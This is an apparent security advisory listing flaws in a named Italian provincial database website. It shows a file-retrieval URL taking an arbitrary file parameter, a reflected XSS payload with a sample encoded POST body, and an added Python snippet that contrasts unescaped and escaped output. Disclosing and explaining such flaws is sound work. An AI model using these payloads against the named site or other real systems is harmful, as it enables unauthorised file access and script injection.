http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file}
(requests shouldn't be done via browser but with a simple client)
_________________________________________
XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just do a simple search with a term that can be found (e.g. "este") and select the option to find any submitted word:
este <script>alert(1);</script>
Sample POST data:
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1
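As an added illustration (not part of the original advisory), this Python decodes the sample POST body quoted above and contrasts the unencoded reflection of the search term with a correctly HTML-escaped rendering, plus a check that confirms whether live markup is still reflected; the results-page markup ("Risultati per:") and the function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# The POST body quoted in the advisory; value(VALUE) carries the free-text search term.
SAMPLE_BODY = ("value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E"
               "&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1")


def search_term(body: str) -> str:
    """Decode the urlencoded form body and return the free-text search term."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("value(VALUE)", [""])[0]


def render_vulnerable(term: str) -> str:
    """Echo the term into the results page without encoding (the flaw described above).
    The surrounding markup is an assumption, not the site's real template."""
    return f"<h2>Risultati per: {term}</h2>"


def render_fixed(term: str) -> str:
    """Same page with contextual HTML escaping: angle brackets and quotes become inert text."""
    return f"<h2>Risultati per: {html.escape(term, quote=True)}</h2>"


# Matches a real (unescaped) opening or closing script tag.
SCRIPT_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def is_markup_reflected(page: str, term: str) -> bool:
    """True when the submitted term carried a script tag and the rendered page still
    contains one as live markup, i.e. the output encoding is missing or broken."""
    return bool(SCRIPT_RE.search(term)) and bool(SCRIPT_RE.search(page))


if __name__ == "__main__":
    term = search_term(SAMPLE_BODY)
    print("decoded term:", term)
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render(term)
        print(f"{label}: reflected={is_markup_reflected(page, term)} {page}")
```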
_________________________________________
Etc